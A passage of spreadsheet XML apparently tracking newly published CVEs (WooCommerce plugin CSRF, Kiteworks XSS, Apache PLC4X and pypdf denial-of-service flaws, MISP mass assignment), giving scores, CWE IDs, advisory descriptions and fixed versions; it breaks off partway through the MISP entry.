          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G78" s="5" t="inlineStr"/>
      <c r="H78" s="5" t="inlineStr"/>
      <c r="I78" s="5" t="inlineStr"/>
      <c r="J78" s="5" t="inlineStr"/>
      <c r="K78" s="5" t="inlineStr"/>
      <c r="L78" s="5" t="inlineStr"/>
      <c r="M78" s="5" t="inlineStr"/>
      <c r="N78" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O78" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P78" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q78" s="5" t="inlineStr"/>
      <c r="R78" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S78" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Request Forgery (CSRF) in Blacklist Manager &amp;#8211; WooCommerce Anti-Fraud, Blacklist &amp;amp; Checkout Verification &lt;= 2.3.1 versions.</t>
        </is>
      </c>
      <c r="T78" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96838</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B79" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C79" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97291</t>
        </is>
      </c>
      <c r="D79" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E79" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F79" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G79" s="5" t="inlineStr"/>
      <c r="H79" s="5" t="inlineStr"/>
      <c r="I79" s="5" t="inlineStr"/>
      <c r="J79" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K79" s="5" t="inlineStr"/>
      <c r="L79" s="5" t="inlineStr"/>
      <c r="M79" s="5" t="inlineStr"/>
      <c r="N79" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O79" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P79" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q79" s="5" t="inlineStr"/>
      <c r="R79" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S79" s="5" t="inlineStr">
        <is>
          <t>Contributor PHP Object Injection in Schema &amp; Structured Data for WP &amp; AMP &lt;= 1.66 versions.</t>
        </is>
      </c>
      <c r="T79" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97291</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B80" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C80" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102092</t>
        </is>
      </c>
      <c r="D80" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E80" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F80" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G80" s="5" t="inlineStr"/>
      <c r="H80" s="5" t="inlineStr"/>
      <c r="I80" s="5" t="inlineStr"/>
      <c r="J80" s="5" t="inlineStr"/>
      <c r="K80" s="5" t="inlineStr"/>
      <c r="L80" s="5" t="inlineStr"/>
      <c r="M80" s="5" t="inlineStr"/>
      <c r="N80" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O80" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P80" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q80" s="5" t="inlineStr"/>
      <c r="R80" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S80" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Core before version 9.5.0 is vulnerable to Stored Cross-site Scripting (XSS) that could allow an authenticated user to store crafted content that executes arbitrary JavaScript in another user's authenticated session when they preview shared content. This could potentially lead to session compromise and account takeover.</t>
        </is>
      </c>
      <c r="T80" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102092</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B81" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C81" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102100</t>
        </is>
      </c>
      <c r="D81" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E81" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F81" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G81" s="5" t="inlineStr"/>
      <c r="H81" s="5" t="inlineStr"/>
      <c r="I81" s="5" t="inlineStr"/>
      <c r="J81" s="5" t="inlineStr"/>
      <c r="K81" s="5" t="inlineStr"/>
      <c r="L81" s="5" t="inlineStr"/>
      <c r="M81" s="5" t="inlineStr"/>
      <c r="N81" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O81" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P81" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q81" s="5" t="inlineStr"/>
      <c r="R81" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S81" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Core before version 9.5.0 is vulnerable to Stored Cross-Site Scripting. A stored cross-site scripting (XSS) weakness in Kiteworks Core could allow an authenticated user to submit content that, when later viewed by another user, executes arbitrary JavaScript in that user's authenticated session. This could be used to perform actions on the victim's behalf and may have permitted account takeover, including of higher-privileged users. Exploitation requires the victim to view the attacker-supplied content.</t>
        </is>
      </c>
      <c r="T81" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102100</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B82" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C82" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102509</t>
        </is>
      </c>
      <c r="D82" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E82" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F82" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G82" s="5" t="inlineStr"/>
      <c r="H82" s="5" t="inlineStr"/>
      <c r="I82" s="5" t="inlineStr"/>
      <c r="J82" s="5" t="inlineStr">
        <is>
          <t>go, rust</t>
        </is>
      </c>
      <c r="K82" s="5" t="inlineStr"/>
      <c r="L82" s="5" t="inlineStr"/>
      <c r="M82" s="5" t="inlineStr"/>
      <c r="N82" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O82" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P82" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q82" s="5" t="inlineStr"/>
      <c r="R82" s="5" t="inlineStr">
        <is>
          <t>CWE-674, CWE-770, CWE-789</t>
        </is>
      </c>
      <c r="S82" s="5" t="inlineStr">
        <is>
          <t>Memory Allocation with Excessive Size Value, Allocation of Resources Without Limits, and Uncontrolled Recursion in the Java implementation of Apache PLC4X (PLC4J) allow a malicious or impersonated device to exhaust the memory or stack of the client application, causing a denial of service.
In the OPC UA driver these defects are reachable before authentication: the offending data is parsed while the secure channel and session are being established, before the server's identity has been bound to it. Configuring a trusted server therefore does not prevent exploitation by an attacker who can 
impersonate it.
The individual defects are:
- Length-prefixed byte strings are allocated at the size claimed on the wire before the length is checked against the data actually received (0.10.0 through 0.13.1).
- Array fields in generated protocol parsers pre-allocate a list with the element count claimed on the wire, allowing a single count field to trigger a multi-gigabyte allocation. This parser is shared by all PLC4J drivers; the OPC UA driver is the verified pre-authentication path (0.10.0 through 0.13.1).
- The OPC UA driver accumulates message chunks without enforcing the negotiated maximum chunk count and message size (0.12.0 through 0.13.1).
- The OPC UA driver pre-allocates collections using element counts received from the server (0.10.0 through 0.13.1).
- Recursive protocol types are parsed without a nesting-depth limit. The same defect in the Go implementation is covered by  CVE-2026-102510 https://cveprocess.apache.org/cve5/CVE-2026-102510 .
This issue affects Apache PLC4X: from 0.10.0 before 1.0.0.
Users are recommended to upgrade to version 1.0.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="T82" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102509</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B83" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C83" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102510</t>
        </is>
      </c>
      <c r="D83" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E83" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F83" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G83" s="5" t="inlineStr"/>
      <c r="H83" s="5" t="inlineStr"/>
      <c r="I83" s="5" t="inlineStr"/>
      <c r="J83" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K83" s="5" t="inlineStr"/>
      <c r="L83" s="5" t="inlineStr"/>
      <c r="M83" s="5" t="inlineStr"/>
      <c r="N83" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O83" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P83" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q83" s="5" t="inlineStr"/>
      <c r="R83" s="5" t="inlineStr">
        <is>
          <t>CWE-129, CWE-190, CWE-674, CWE-789</t>
        </is>
      </c>
      <c r="S83" s="5" t="inlineStr">
        <is>
          <t>Integer Overflow, Improper Validation of Array Index, Uncontrolled Recursion and Memory Allocation with Excessive Size Value in the Go implementation of Apache PLC4X (PLC4Go) allow a malicious device, or an attacker able to inject network traffic, to crash or exhaust the memory of the client application,
causing a denial of service.
The individual defects are:
- Generated parsers pre-allocate arrays with the element count claimed on the wire (0.13.0 through 0.13.1).
- Transport read helpers allocate buffers of the size claimed on the wire without an upper bound.
- ADS and KNXnet/IP response handling indexes into received data without checking its length, causing a panic.
- ADS and EIP frame-length handling accepts, or arithmetically wraps to, a length of zero, breaking message framing.
- Recursive protocol types are parsed without a nesting-depth limit. The same defect in the Java implementation is covered by  CVE-2026-102509 https://cveprocess.apache.org/cve5/CVE-2026-102509 .
Additionally, length and position arithmetic in generated serializers was performed in 16-bit integers. If an application forwards attacker-influenced payloads larger than 8 KB, the length field wraps, and the remainder of the payload may be interpreted by the receiving device (for example, an ADS PLC) as 
additional, independent protocol messages.
This issue affects Apache PLC4X: from 0.11.0 before 1.0.0. PLC4Go is consumed as the Go module github.com/apache/plc4x/plc4go; versions refer to the corresponding Apache PLC4X releases.
Users are recommended to upgrade to version 1.0.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="T83" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102510</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B84" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C84" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102993</t>
        </is>
      </c>
      <c r="D84" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E84" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F84" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G84" s="5" t="inlineStr"/>
      <c r="H84" s="5" t="inlineStr"/>
      <c r="I84" s="5" t="inlineStr"/>
      <c r="J84" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K84" s="5" t="inlineStr"/>
      <c r="L84" s="5" t="inlineStr"/>
      <c r="M84" s="5" t="inlineStr"/>
      <c r="N84" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O84" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P84" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q84" s="5" t="inlineStr"/>
      <c r="R84" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="S84" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.17.0, a crafted PDF can provide unusually large Roman page-label values that cause pypdf/_page_labels.py to generate excessively large numeral strings when an application retrieves document page labels, consuming large amounts of memory and potentially making the application unavailable. This issue is fixed in version 6.17.0.</t>
        </is>
      </c>
      <c r="T84" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102993</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B85" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C85" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102994</t>
        </is>
      </c>
      <c r="D85" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E85" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F85" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G85" s="5" t="inlineStr"/>
      <c r="H85" s="5" t="inlineStr"/>
      <c r="I85" s="5" t="inlineStr"/>
      <c r="J85" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K85" s="5" t="inlineStr"/>
      <c r="L85" s="5" t="inlineStr"/>
      <c r="M85" s="5" t="inlineStr"/>
      <c r="N85" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O85" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P85" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q85" s="5" t="inlineStr"/>
      <c r="R85" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="S85" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.18.0, a crafted PDF containing indirect-object identifiers or generation-number tokens that continue for a long time without whitespace can cause pypdf/_reader.py and pypdf/generic/_base.py to scan excessive input through read_until_whitespace, resulting in long runtimes and application unavailability. This issue is fixed in version 6.18.0.</t>
        </is>
      </c>
      <c r="T85" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102994</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B86" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C86" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102995</t>
        </is>
      </c>
      <c r="D86" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E86" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F86" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G86" s="5" t="inlineStr"/>
      <c r="H86" s="5" t="inlineStr"/>
      <c r="I86" s="5" t="inlineStr"/>
      <c r="J86" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K86" s="5" t="inlineStr"/>
      <c r="L86" s="5" t="inlineStr"/>
      <c r="M86" s="5" t="inlineStr"/>
      <c r="N86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O86" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P86" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q86" s="5" t="inlineStr"/>
      <c r="R86" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S86" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.18.1, a crafted PDF can place unusually large source-code or destination-string tokens in a font /ToUnicode mapping, causing pypdf/_cmap.py parse_bfchar to decode and retain oversized values during operations such as text extraction and consume excessive memory. This is a second follow-up to earlier /ToUnicode resource-consumption fixes and is limited to the remaining token-length path. This issue is fixed in version 6.18.1.</t>
        </is>
      </c>
      <c r="T86" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102995</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B87" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C87" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102996</t>
        </is>
      </c>
      <c r="D87" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E87" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F87" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G87" s="5" t="inlineStr"/>
      <c r="H87" s="5" t="inlineStr"/>
      <c r="I87" s="5" t="inlineStr"/>
      <c r="J87" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K87" s="5" t="inlineStr"/>
      <c r="L87" s="5" t="inlineStr"/>
      <c r="M87" s="5" t="inlineStr"/>
      <c r="N87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O87" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P87" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q87" s="5" t="inlineStr"/>
      <c r="R87" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S87" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.18.1, a crafted PDF can provide a TrueType or Type1 simple font with an unusually large /Widths array, causing pypdf/_font.py Font._collect_tt_t1_character_widths to process entries beyond the 256 character codes meaningful for a simple font and consume excessive memory during operations such as text extraction. This issue is fixed in version 6.18.1.</t>
        </is>
      </c>
      <c r="T87" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102996</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B88" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C88" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102997</t>
        </is>
      </c>
      <c r="D88" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E88" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F88" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G88" s="5" t="inlineStr"/>
      <c r="H88" s="5" t="inlineStr"/>
      <c r="I88" s="5" t="inlineStr"/>
      <c r="J88" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K88" s="5" t="inlineStr"/>
      <c r="L88" s="5" t="inlineStr"/>
      <c r="M88" s="5" t="inlineStr"/>
      <c r="N88" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O88" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P88" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q88" s="5" t="inlineStr"/>
      <c r="R88" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="S88" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.18.1, a crafted PDF containing a partially malformed /FlateDecode stream with padded data can force pypdf/filters.py to use inefficient byte-by-byte decompression while the earlier recovery counter fails to advance for bytes that successfully decode, causing long runtimes and application unavailability. This is a residual issue after the malformed FlateDecode recovery fix. This issue is fixed in version 6.18.1.</t>
        </is>
      </c>
      <c r="T88" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102997</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B89" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C89" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102998</t>
        </is>
      </c>
      <c r="D89" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E89" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F89" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G89" s="5" t="inlineStr"/>
      <c r="H89" s="5" t="inlineStr"/>
      <c r="I89" s="5" t="inlineStr"/>
      <c r="J89" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K89" s="5" t="inlineStr"/>
      <c r="L89" s="5" t="inlineStr"/>
      <c r="M89" s="5" t="inlineStr"/>
      <c r="N89" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O89" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P89" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q89" s="5" t="inlineStr"/>
      <c r="R89" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S89" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.19.0, a crafted PDF with form field values can cause pypdf/generic/_appearance_stream.py appearance-stream generation to repeat invariant selection-data work inside a loop when an application updates fields with flattening enabled, resulting in excessive runtimes and application unavailability. This issue is fixed in version 6.19.0.</t>
        </is>
      </c>
      <c r="T89" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102998</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B90" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C90" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102999</t>
        </is>
      </c>
      <c r="D90" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E90" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F90" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G90" s="5" t="inlineStr"/>
      <c r="H90" s="5" t="inlineStr"/>
      <c r="I90" s="5" t="inlineStr"/>
      <c r="J90" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K90" s="5" t="inlineStr"/>
      <c r="L90" s="5" t="inlineStr"/>
      <c r="M90" s="5" t="inlineStr"/>
      <c r="N90" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O90" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P90" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q90" s="5" t="inlineStr"/>
      <c r="R90" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="S90" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.19.0, a crafted PDF containing many embedded files can cause the dictionary-based attachments API in pypdf/_doc_common.py to reparse the full attachment list for each content lookup, producing repeated work and long runtimes when an application accesses the embedded-file mapping. This issue is fixed in version 6.19.0.</t>
        </is>
      </c>
      <c r="T90" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102999</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B91" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C91" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103000</t>
        </is>
      </c>
      <c r="D91" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E91" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F91" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G91" s="5" t="inlineStr"/>
      <c r="H91" s="5" t="inlineStr"/>
      <c r="I91" s="5" t="inlineStr"/>
      <c r="J91" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K91" s="5" t="inlineStr"/>
      <c r="L91" s="5" t="inlineStr"/>
      <c r="M91" s="5" t="inlineStr"/>
      <c r="N91" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O91" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P91" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q91" s="5" t="inlineStr"/>
      <c r="R91" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S91" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.19.0, a crafted PDF can provide unusually large alphabetical page-label values that cause pypdf/_page_labels.py to generate strings beyond a reasonable page-label length when an application retrieves document page labels, consuming excessive memory and potentially making the application unavailable. This issue is fixed in version 6.19.0.</t>
        </is>
      </c>
      <c r="T91" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103000</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B92" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C92" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103235</t>
        </is>
      </c>
      <c r="D92" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E92" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F92" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G92" s="5" t="inlineStr"/>
      <c r="H92" s="5" t="inlineStr"/>
      <c r="I92" s="5" t="inlineStr"/>
      <c r="J92" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K92" s="5" t="inlineStr"/>
      <c r="L92" s="5" t="inlineStr"/>
      <c r="M92" s="5" t="inlineStr"/>
      <c r="N92" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O92" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P92" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q92" s="5" t="inlineStr"/>
      <c r="R92" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-915</t>
        </is>
      </c>
      <c r="S92" s="5" t="inlineStr">
        <is>
          <t>MISP contains a mass assignment vulnerability in the event delegation feature. When a user with delegation permission submits a delegation request, the application authorized the user against the event identified in the URL but then persisted the entire submitted record, including caller-supplied fields such as the primary key and event_id.
An authenticated attacker could inject a primary key or event_id into the delegation payload to retarget an existing delegation record to any event on the instance. Because a delegation row grants the requesting organisation read access to the event it references, this effectively granted read access to arbitrary events belonging to other organisations. If the target organisation subsequently accepted the delegation, ownership of the event was transferred and the original record was deleted.
Preconditions:
- An authenticated user with the delegation permission (perm_delegate)
